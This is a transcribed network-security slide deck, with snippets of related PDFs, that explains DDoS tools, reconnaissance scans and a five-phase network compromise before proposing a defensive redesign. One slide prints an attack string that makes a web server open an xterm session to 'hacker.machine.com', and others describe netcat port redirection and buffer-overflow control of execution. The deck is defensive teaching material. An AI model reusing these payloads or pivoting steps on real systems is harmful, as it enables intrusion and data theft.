Stop that Big Hack Attack Protecting Your Network from Hackers.

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "Stop that Big Hack Attack Protecting Your Network from Hackers. www.lauraknapp.com"

Transcription

1 Stop that Big Hack Attack Protecting Your Network from Hackers Laura Jeanne Knapp Technical Evangelist NetSec_ 010

2 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 020

3 Distributed Denial of Service (DDoS) Yahoo, Amazon.com, CNN.com, Ebay, Etrade, and others were all part of the February 2000 distributed denial of service attack. Tools like Tribe Flood Network (TFN), Trin00, stacheldraht, and shaft NetSec_ 030

4 Smurf Attack x ICMP REPLY D= S= Overwhelm WAN link to destination ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REQ D= S= Used by TFN (Tribe Flood Network ) NetSec_ 040

5 How DDoS Works Scan for systems to hack Install software to scan for, compromise, and infect agents Agents get loaded with remote control attack software Client issues commands to handlers which control agents in a mass attack Handlers Agents NetSec_ 050

6 Stacheldraht Attack (German for Barbed Wire) Once enough agents are ready Hacker sends command to handlers initiating attack Handlers notify agents who then flood the hacked site preventing legitimate users access Handlers Site to be hacked Legitimate Customer Agents NetSec_ 060

7 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 070

8 Typical Network Design Today Mainframe Module Building Module WAN Module CORE Back end database Server Module Internet Module Public Servers NetSec_ 080

9 Access Router Access Control List (ACL) Source Destination Protocol Action Outside DMZ SMTP Permit Back end database Outside DMZ HTTP Permit Public Servers Outside DMZ DNS Permit Outside DMZ SSL Permit Outside Outside ANY ANY EST TCP/UDP Replies ICMP Echo/ Reply Permit Permit 120 NetSec_ 090

10 Firewall Rules Source Destination Protocol Action Back end database Internal Any Any Permit Public Servers Dual firewall configuration Web Server Public SMTP Back end Database Internal SMTP SQL SMTP Permit Permit Inbound traffic limited to services on DMZ Any Any ICMP Echo-reply Permit Open internal network DMZ Internal SSH Permit Full outbound access allowed (no traditional FTP) 120 NetSec_ 100

11 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 110

12 Anatomy of a Network Compromise Mainframe Module Building Module WAN Module Phase 1: Network Recon Phase 2: own the system CORE Phase 3: Exploit trust Back end database Phase 4: Reach for the gold Server Module Internet Module Public Servers Phase 5: own the network NetSec_ 120

13 Network Recon Learn about the site Building Module Mainframe Module WAN Module Discovery sequence Server Module CORE Internet Module Public Servers Back end database Ping sweep (identifies hosts) nmap, ping, hping, icmpquery icmpush Port scan (identifies services) strobe, netcat, fscan, udp_scan, nmap, portscan Whois, DNS, web pages Discovery results Address ranges Hosts Services Servers (smtp, dns, http,...) Outdated software like bind NetSec_ 130

14 Scanning Tools NetSec_ 140

15 Network Recon - Ping Sweep Cable modem subnet Let s look at closer NetSec_ 150

16 Network Recon : Port Scan Not much running This is the default router for my subnet Good security to turn off telnet and other access ports NetSec_ 160

17 Network Recon - Syn Scan This scan on an end user device shows many ports open and potentially vulnerable to use by a hacker Half open scanning Send a syn then wait on response RST = non-listener Syn/ack= listener (tear down session) NetSec_ 170

18 Network Recon :UDP Port Scan This UDP port scan shows status of common UDP ports Again this is an end user device Sends 0 byte UDP packets NetSec_ 180

19 Network Recon : Other Scans Xmas Scan More clandestine than syn scan Turns on FIN, Urge, and PUSH flags Not good against Microsoft OS Idle Scan Truly blind port scan Uses IP fragmentation ID IDS shows predefined zombie machine Shows trusted relationships between machines TCP Header Bit Header Length 16-Bit Source Port Number Reserved (6 Bits) 32-Bit Sequence Number 32-Bit Acknowledgment Number U R G A C K 16-Bit TCP Checksum P S H R S T S Y N F I N TCP Options Data 16-Bit Destination Port Number 16-Bit Window Size 16-Bit Urgent Pointer Fin Stealth Uses bare FIN packet as probe Not good against Microsoft OS ACK Scan Maps firewall rule sets Null scan Turns off all flags NetSec_ 190

20 Own a System Compromise one host Mainframe Module Obvious target is Web Building Module WAN Module Vulnerability scan Send attack sequence CORE Ffqdn=%)A/usr/X11R6/bin/xterm%20- display%20hacker.machine.com:0 Back end database Xterm displayed on hacker machine Server Module Internet Module Public Servers OS version detected Hacker FTPs buffer overflow Buffer overflow allows root access Attacker now owns the system NetSec_ 200

21 Own a System - OS Detection Fingerprints Multiple techniques used to identify OS Based on knowledge of network stack from vendor Has database of known OS fingerprints This one was from a Linksys router even though this application didn t pinpoint exactly. NetSec_ 210

22 Own a System - Buffer Overflow A buffer overflow occurs when something very large is placed in a box far too small for it to fit. It's all gotta go somewhere. An example in code is as follows: void func(void) { int i; char buffer[256]; // * for(i=0;i<512;i++) buffer[i]='a'; //! return; } As you can see, our 'buffer' gets filled with 256 'A's, followed by 256 more that just don't fit. The rest of those 'A's have to go somewhere. And where they go depends on your operating system implementation and programming language Here is a picture of a healthy 32-bit stack, in such an operating system as Windows running on an Intel platform. ESP-> EBP-> Local Variables i Buffer Old Value of EBP Return Address When the "func" procedure returns, it moves EBP back into ESP, and POP's the return address off the stack. When the above line of code marked '!' executes it overflows the buffer, writing 'A's over the old value of EBP and over the return address. By overwriting the return address, you can seriously alter the course of program flow. All you have to do is change the return address to point to a memory location of your choice, and the code you want to execute will be reached when this procedure decides to 'return'. If you stuff the buffer with code bytes, you can then reroute the EIP to them on the next RET, since the stack is considered executable memory in Windows on the Intel architecture. NetSec_ 220

23 Own a System - Exploiting Holes Web Vulnerabilities Inherent in application extensions like c++, Perl, XML, CGI, etc CGI scripts not checking input IIS RDS vulnerability in showcode.asp grants remote command privalages HTTP bypass I grants access to server s logging functions Pages can be edited with no auditing trail Cross scripting exploits the exchange of cookies Scripts can be planted to alter Web page appearance Scripts can launch malware Scripts can capture confidential information attacks Command manipulation attacks EXPN or VRFY can cause a system to crash by attacking mail transfer agent with a buffer overflow Hacker gets access to key files Hacker can add trojan horse to mail server Transport level attacks Cause temporary error condition that results in a debug shell with admin privileges NetSec_ 230

24 Application Layer Attacks CGI-BIN Takes advantage of insecure coding methods New vulnerabilities constantly being discovered Buffer Overflow Specialized code build to overflow the buffers Insecure coding at the heart of these functions NetSec_ 240

25 Root Kits Allows compromised machine to have custom versions of utilities and back doors Hacker can operate without being detected Originally were UNIX based but NT, 2000, XP are becoming available NetSec_ 250

26 Exploit Trust Recon phase 2 Building Module Mainframe Module WAN Module Explore log files running processes configuration files CORE utilize password tools sniff Back end database Results Server Module Internet Module Public Servers Knows userid/passwords Knows communications Knows protocols used NetSec_ 260

27 Reach for the Gold Building Module Mainframe Module WAN Module Firewall blocks hacker access to back end database CORE Use netcat to set up port redirection on web server for port 25 Redirect to back end database port 22 (SSH) Back end database Launch SSH from attack station on port 25 to web server Server Module Internet Module Public Servers Results in interactive session with back end database Root access due to cracked userid/passwords Credit card numbers retrieved NetSec_ 270

28 Port Redirection Attack Attacker Compromised System A Allows traffic entering a compromised machine (i.e SysA/TCP/25 SMTP) to be redirected to a different machine on a different port (SysB/TCP/23) Hacker exploits trusted relationships System B Root kit base install allows redirection process, files, and connections to be hidden NetSec_ 280

29 Password Toolset NetSec_ 290

30 Own the Network Building Module Mainframe Module WAN Module Take over vulnerable systems It s easy - no firewalls, no encryption, no ACLs... CORE Do more pings, port scans, sniffing, vulnerability scans Back end database Exploit Server Module Internet Module Public Servers Send Trojan s Install code for DDoS NetSec_ 300

31 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 310

32 Threat Assistance Application Layer Root Kits DDoS source DDoS victim Password cracking Port redirection System Admin Intrusion Detection Trust Model Filtering VLANs Network audit Verify forwarding NetSec_ 320

33 Changes in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Firewall the access routers Back end database Pro: No topology impact Pro: session vs packet tracking Public Servers Pro: multiple perimeters Con: impacts router performance NetSec_ 330

34 Change 2 in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Third firewall interface Pro: Doesn t impact routers Con: increased load on firewall Con: topology impact NetSec_ 340

35 Change 3 in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Do both Pro: Maximum security Pro: tiered filtering and audit model Con: performance impact NetSec_ 350

36 Impede DDoS Vulnerability Have ISP filter for DDoS RFC 2267: Ingress packets must be from customer addresses Egress packets cannot be from and to customer Make sure ingress packets are valid RFC 1918 ISP filtering on private IP addresses Utilize private IP addresses internally NetSec_ 360

37 Public Host Vulnerability Utilize intrusion detection systems Host based can stop at OS level Network based can stop attacks at the network layer such as DDoS False positives are number one concern - tuning critical Carefully design in placement important Network audit Private VLANs Isolated ports can only communicate with promiscuous ports Promiscuous ports can communicate with all ports Community ports can communicate with other community members and all promiscuous ports All within the same VLAN NetSec_ 370

38 Server Module Problem Absolutely no security Server Module Solution Segment department servers with department VLANs Filter between VLANs based on network number Private VLANs for corporate-wide servers Intrusion detection systems Server Module Network audits NetSec_ 380

39 Building Module Problem Disparate points of access Hosts are hard to protect and manage Only One Subnet! Primary VLAN Community VLAN Community VLAN Promiscuous Port Promiscuous Port Solution VLANs Isolated VLAN Community A x x x Community B Isolated Ports NetSec_ 390

40 Mainframe Module Mainframe Module Problem Mainframe security is often overlooked What is the access control? Mainframe Module Solution Firewall at access router Consider encryption Network audit NetSec_ 400

41 WAN Module Problem WAN Module Trust issues with Internet coexisting with private links Physical issues Packets in clear Auditing is seldom done Solution Network audit Encryption NetSec_ 410

42 The Network Redesign Mainframe Module Building Module WAN Module Server Module Internet Module NetSec_ 420

43 Hacker Prevention Mainframe Module Building Module WAN Module Network compromise attack Server Module Network recon: same level of success Intrusion detection system alarmed security Internet Module own a system Xterm would fail preventing the buffer overflow attack Exploit trust No interactive sessions possible from web to inside Port redirection would fail NetSec_ 430

44 Summary Security is a system wide issue Network security is only as strong as your weakest link Network security is complex Good system administration is at the core of network security Examine your networks often Keep up with known attacks Re-evaluate your security structure NetSec_ 440

Securing E-Commerce. Agenda. The Security Problem IC Security: Key Elements Designing and Implementing. 3203 1346_06_2000_c1_sec3

Securing E-Commerce. Agenda. The Security Problem IC Security: Key Elements Designing and Implementing. 3203 1346_06_2000_c1_sec3 Securing E-Commerce 1 Agenda The Security Problem IC Security: Key Elements Designing and Implementing 2 The Security Dilemma Internet Business Value Internet Access Corporate Intranet Internet Presence

More information

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Port Scanning Objectives 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Introduction: All machines connected to a LAN or connected to Internet via a modem

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS)

Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS) Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS) Signature based IDS systems use these fingerprints to verify that an attack is taking place. The problem with this method

More information

Firewalls. Chapter 3

Firewalls. Chapter 3 Firewalls Chapter 3 1 Border Firewall Passed Packet (Ingress) Passed Packet (Egress) Attack Packet Hardened Client PC Internet (Not Trusted) Hardened Server Dropped Packet (Ingress) Log File Internet Border

More information

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology Port Scanning and Vulnerability Assessment ECE4893 Internetwork Security Georgia Institute of Technology Agenda Reconnaissance Scanning Network Mapping OS detection Vulnerability assessment Reconnaissance

More information

Introduction of Intrusion Detection Systems

Introduction of Intrusion Detection Systems Introduction of Intrusion Detection Systems Why IDS? Inspects all inbound and outbound network activity and identifies a network or system attack from someone attempting to compromise a system. Detection:

More information

CMPT 471 Networking II

CMPT 471 Networking II CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access

More information

Denial of Service. Tom Chen SMU tchen@engr.smu.edu

Denial of Service. Tom Chen SMU tchen@engr.smu.edu Denial of Service Tom Chen SMU tchen@engr.smu.edu Outline Introduction Basics of DoS Distributed DoS (DDoS) Defenses Tracing Attacks TC/BUPT/8704 SMU Engineering p. 2 Introduction What is DoS? 4 types

More information

Presented By: Holes in the Fence. Agenda. IPCCTV Attack. DDos Attack. Why Network Security is Important

Presented By: Holes in the Fence. Agenda. IPCCTV Attack. DDos Attack. Why Network Security is Important Presented By: Holes in the Fence Dave Engebretson, Contributing Technology writer, SDM Magazine Industry Instructor in Fiber and Networking Prevention of Security System breaches of networked Edge Devices

More information

CS5008: Internet Computing

CS5008: Internet Computing CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is

More information

Firewalls. Test your Firewall knowledge. Test your Firewall knowledge (cont) (March 4, 2015)

Firewalls. Test your Firewall knowledge. Test your Firewall knowledge (cont) (March 4, 2015) s (March 4, 2015) Abdou Illia Spring 2015 Test your knowledge Which of the following is true about firewalls? a) A firewall is a hardware device b) A firewall is a software program c) s could be hardware

More information

Denial Of Service. Types of attacks

Denial Of Service. Types of attacks Denial Of Service The goal of a denial of service attack is to deny legitimate users access to a particular resource. An incident is considered an attack if a malicious user intentionally disrupts service

More information

Secure Software Programming and Vulnerability Analysis

Secure Software Programming and Vulnerability Analysis Secure Software Programming and Vulnerability Analysis Christopher Kruegel chris@auto.tuwien.ac.at http://www.auto.tuwien.ac.at/~chris Operations and Denial of Service Secure Software Programming 2 Overview

More information

Implementing Secure Converged Wide Area Networks (ISCW)

Implementing Secure Converged Wide Area Networks (ISCW) Implementing Secure Converged Wide Area Networks (ISCW) 1 Mitigating Threats and Attacks with Access Lists Lesson 7 Module 5 Cisco Device Hardening 2 Module Introduction The open nature of the Internet

More information

A1.1.1.11.1.1.2 1.1.1.3S B

A1.1.1.11.1.1.2 1.1.1.3S B CS Computer 640: Network AdityaAkella Lecture Introduction Networks Security 25 to Security DoS Firewalls and The D-DoS Vulnerabilities Road Ahead Security Attacks Protocol IP ICMP Routing TCP Security

More information

CIT 380: Securing Computer Systems

CIT 380: Securing Computer Systems CIT 380: Securing Computer Systems Scanning CIT 380: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting 5. Vulnerability Scanning

More information

Gaurav Gupta CMSC 681

Gaurav Gupta CMSC 681 Gaurav Gupta CMSC 681 Abstract A distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing Denial of Service for users of the

More information

CYBER ATTACKS EXPLAINED: PACKET CRAFTING

CYBER ATTACKS EXPLAINED: PACKET CRAFTING CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure

More information

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) Author: Avinash Singh Avinash Singh is a Technical Evangelist currently worksing at Appin Technology Lab, Noida. Educational Qualification: B.Tech from Punjab Technical

More information

Firewall Security 101

Firewall Security 101 Firewall Security 101 Laura Jeanne Knapp Technical Evangelist 1-919-224-2205 Laura@lauraknapp.com ISEC_ 010 Hacker Threats Satan and other scanning tools allow hacker to probe network for entry points

More information

Firewalls and Intrusion Detection

Firewalls and Intrusion Detection Firewalls and Intrusion Detection What is a Firewall? A computer system between the internal network and the rest of the Internet A single computer or a set of computers that cooperate to perform the firewall

More information

We will give some overview of firewalls. Figure 1 explains the position of a firewall. Figure 1: A Firewall

We will give some overview of firewalls. Figure 1 explains the position of a firewall. Figure 1: A Firewall Chapter 10 Firewall Firewalls are devices used to protect a local network from network based security threats while at the same time affording access to the wide area network and the internet. Basically,

More information

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module CS 665: Computer System Security Network Security Bojan Cukic Lane Department of Computer Science and Electrical Engineering West Virginia University 1 Usage environment Anonymity Automation, minimal human

More information

Chapter 5. Figure 5-1: Border Firewall. Firewalls. Figure 5-1: Border Firewall. Figure 5-1: Border Firewall. Figure 5-1: Border Firewall

Chapter 5. Figure 5-1: Border Firewall. Firewalls. Figure 5-1: Border Firewall. Figure 5-1: Border Firewall. Figure 5-1: Border Firewall Figure 5-1: Border s Chapter 5 Revised March 2004 Panko, Corporate Computer and Network Security Copyright 2004 Prentice-Hall Border 1. (Not Trusted) Attacker 1 1. Corporate Network (Trusted) 2 Figure

More information

Firewall Introduction Several Types of Firewall. Cisco PIX Firewall

Firewall Introduction Several Types of Firewall. Cisco PIX Firewall Firewall Introduction Several Types of Firewall. Cisco PIX Firewall What is a Firewall? Non-computer industries: a wall that controls the spreading of a fire. Networks: a designed device that controls

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information

Firewalls, IDS and IPS

Firewalls, IDS and IPS Session 9 Firewalls, IDS and IPS Prepared By: Dr. Mohamed Abd-Eldayem Ref.: Corporate Computer and Network Security By: Raymond Panko Basic Firewall Operation 2. Internet Border Firewall 1. Internet (Not

More information

Firewall Firewall August, 2003

Firewall Firewall August, 2003 Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also

More information

Chapter 8 Security Pt 2

Chapter 8 Security Pt 2 Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,

More information

10 Configuring Packet Filtering and Routing Rules

10 Configuring Packet Filtering and Routing Rules Blind Folio 10:1 10 Configuring Packet Filtering and Routing Rules CERTIFICATION OBJECTIVES 10.01 Understanding Packet Filtering and Routing 10.02 Creating and Managing Packet Filtering 10.03 Configuring

More information

Distributed Denial of Service Attack Tools

Distributed Denial of Service Attack Tools Distributed Denial of Service Attack Tools Introduction: Distributed Denial of Service Attack Tools Internet Security Systems (ISS) has identified a number of distributed denial of service tools readily

More information

General Network Security

General Network Security 4 CHAPTER FOUR General Network Security Objectives This chapter covers the following Cisco-specific objectives for the Identify security threats to a network and describe general methods to mitigate those

More information

Content Distribution Networks (CDNs)

Content Distribution Networks (CDNs) 229 Content Distribution Networks (CDNs) A content distribution network can be viewed as a global web replication. main idea: each replica is located in a different geographic area, rather then in the

More information

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, 2011. Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, 2011. Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat. 1 Penetration Testing NTS330 Unit 1 Penetration V1.0 February 20, 2011 Juan Ortega Juan Ortega, juaorteg@uat.edu 1 Juan Ortega, juaorteg@uat.edu 2 Document Properties Title Version V1.0 Author Pen-testers

More information

HP Intelligent Management Center v7.1 Network Traffic Analyzer Administrator Guide

HP Intelligent Management Center v7.1 Network Traffic Analyzer Administrator Guide HP Intelligent Management Center v7.1 Network Traffic Analyzer Administrator Guide Abstract This guide contains comprehensive information for network administrators, engineers, and operators working with

More information

Learn Ethical Hacking, Become a Pentester

Learn Ethical Hacking, Become a Pentester Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,

More information

642 552 Securing Cisco Network Devices (SND)

642 552 Securing Cisco Network Devices (SND) 642 552 Securing Cisco Network Devices (SND) Course Number: 642 552 Length: 1 Day(s) Course Overview This course is part of the training for the Cisco Certified Security Professional, Cisco Firewall Specialist,

More information

Strategies to Protect Against Distributed Denial of Service (DD

Strategies to Protect Against Distributed Denial of Service (DD Strategies to Protect Against Distributed Denial of Service (DD Table of Contents Strategies to Protect Against Distributed Denial of Service (DDoS) Attacks...1 Introduction...1 Understanding the Basics

More information

Security: Attack and Defense

Security: Attack and Defense Security: Attack and Defense Aaron Hertz Carnegie Mellon University Outline! Breaking into hosts! DOS Attacks! Firewalls and other tools 15-441 Computer Networks Spring 2003 Breaking Into Hosts! Guessing

More information

TECHNICAL NOTE 06/02 RESPONSE TO DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACKS

TECHNICAL NOTE 06/02 RESPONSE TO DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACKS TECHNICAL NOTE 06/02 RESPONSE TO DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACKS 2002 This paper was previously published by the National Infrastructure Security Co-ordination Centre (NISCC) a predecessor

More information

Chapter 15. Firewalls, IDS and IPS

Chapter 15. Firewalls, IDS and IPS Chapter 15 Firewalls, IDS and IPS Basic Firewall Operation The firewall is a border firewall. It sits at the boundary between the corporate site and the external Internet. A firewall examines each packet

More information

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering Internet Firewall CSIS 3230 A combination of hardware and software that isolates an organization s internal network from the Internet at large Ch 8.8: Packet filtering, firewalls, intrusion detection Ch

More information

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006 IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in

More information

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP Overview Securing TCP/IP Chapter 6 TCP/IP Open Systems Interconnection Model Anatomy of a Packet Internet Protocol Security (IPSec) Web Security (HTTP over TLS, Secure-HTTP) Lecturer: Pei-yih Ting 1 2

More information

Vulnerability Assessment and Penetration Testing. CC Faculty ALTTC, Ghaziabad

Vulnerability Assessment and Penetration Testing. CC Faculty ALTTC, Ghaziabad Vulnerability Assessment and Penetration Testing CC Faculty ALTTC, Ghaziabad Need Vulnerabilities Vulnerabilities are transpiring in different platforms and applications regularly. Information Security

More information

Firewalls. Network Security. Firewalls Defined. Firewalls

Firewalls. Network Security. Firewalls Defined. Firewalls Network Security Firewalls Firewalls Types of Firewalls Screening router firewalls Computer-based firewalls Firewall appliances Host firewalls (firewalls on clients and servers) Inspection Methods Firewall

More information

Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006

Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006 Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed

More information

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006 CSE331: Introduction to Networks and Security Lecture 17 Fall 2006 Announcements Project 2 is due next Weds. Homework 2 has been assigned: It's due on Monday, November 6th. CSE331 Fall 2004 2 Summary:

More information

Firewalls. Ingress Filtering. Ingress Filtering. Network Security. Firewalls. Access lists Ingress filtering. Egress filtering NAT

Firewalls. Ingress Filtering. Ingress Filtering. Network Security. Firewalls. Access lists Ingress filtering. Egress filtering NAT Network Security s Access lists Ingress filtering s Egress filtering NAT 2 Drivers of Performance RequirementsTraffic Volume and Complexity of Static IP Packet Filter Corporate Network The Complexity of

More information

Host Discovery with nmap

Host Discovery with nmap Host Discovery with nmap By: Mark Wolfgang moonpie@moonpie.org November 2002 Table of Contents Host Discovery with nmap... 1 1. Introduction... 3 1.1 What is Host Discovery?... 4 2. Exploring nmap s Default

More information

Seminar Computer Security

Seminar Computer Security Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example

More information

Lecture 5: Network Attacks I. Course Admin

Lecture 5: Network Attacks I. Course Admin Lecture 5: Network Attacks I CS 336/536: Computer Network Security Fall 2013 Nitesh Saxena Adopted from previous lectures by Keith Ross Course Admin HW/Lab 1 Due Coming Monday 11am Lab sessions are active

More information

Botnets. Botnets and Spam. Joining the IRC Channel. Command and Control. Tadayoshi Kohno

Botnets. Botnets and Spam. Joining the IRC Channel. Command and Control. Tadayoshi Kohno CSE 490K Lecture 14 Botnets and Spam Tadayoshi Kohno Some slides based on Vitaly Shmatikov s Botnets! Botnet = network of autonomous programs capable of acting on instructions Typically a large (up to

More information

Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall.

Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall. Firewalls 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible servers and networks 2 1 Castle and

More information

Security principles Firewalls and NAT

Security principles Firewalls and NAT Security principles Firewalls and NAT These materials are licensed under the Creative Commons Attribution-Noncommercial 3.0 Unported license (http://creativecommons.org/licenses/by-nc/3.0/) Host vs Network

More information

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls

More information

Linux Network Security

Linux Network Security Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols

More information

INTRODUCTION TO FIREWALL SECURITY

INTRODUCTION TO FIREWALL SECURITY INTRODUCTION TO FIREWALL SECURITY SESSION 1 Agenda Introduction to Firewalls Types of Firewalls Modes and Deployments Key Features in a Firewall Emerging Trends 2 Printed in USA. What Is a Firewall DMZ

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

DDos. Distributed Denial of Service Attacks. by Mark Schuchter

DDos. Distributed Denial of Service Attacks. by Mark Schuchter DDos Distributed Denial of Service Attacks by Mark Schuchter Overview Introduction Why? Timeline How? Typical attack (UNIX) Typical attack (Windows) Introduction limited and consumable resources (memory,

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

Development of a Network Intrusion Detection System

Development of a Network Intrusion Detection System Development of a Network Intrusion Detection System (I): Agent-based Design (FLC1) (ii): Detection Algorithm (FLC2) Supervisor: Dr. Korris Chung Please visit my personal homepage www.comp.polyu.edu.hk/~cskchung/fyp04-05/

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

More information

Overview. Firewall Security. Perimeter Security Devices. Routers

Overview. Firewall Security. Perimeter Security Devices. Routers Overview Firewall Security Chapter 8 Perimeter Security Devices H/W vs. S/W Packet Filtering vs. Stateful Inspection Firewall Topologies Firewall Rulebases Lecturer: Pei-yih Ting 1 2 Perimeter Security

More information

White Paper: Combining Network Intrusion Detection with Firewalls for Maximum Perimeter Protection

White Paper: Combining Network Intrusion Detection with Firewalls for Maximum Perimeter Protection White Paper: Combining Network Intrusion Detection with Firewalls for Maximum Perimeter Protection April 2001 Abstract 2 What is a network intrusion detection system? 2 Electronic security mimics physical

More information

CIT 480: Securing Computer Systems. Firewalls

CIT 480: Securing Computer Systems. Firewalls CIT 480: Securing Computer Systems Firewalls Topics 1. What is a firewall? 2. Types of Firewalls 1. Packet filters (stateless) 2. Stateful firewalls 3. Proxy servers 4. Application layer firewalls 3. Configuring

More information

Network- vs. Host-based Intrusion Detection

Network- vs. Host-based Intrusion Detection Network- vs. Host-based Intrusion Detection A Guide to Intrusion Detection Technology 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free: 800.776.2362 Fax: 678.443.6477

More information

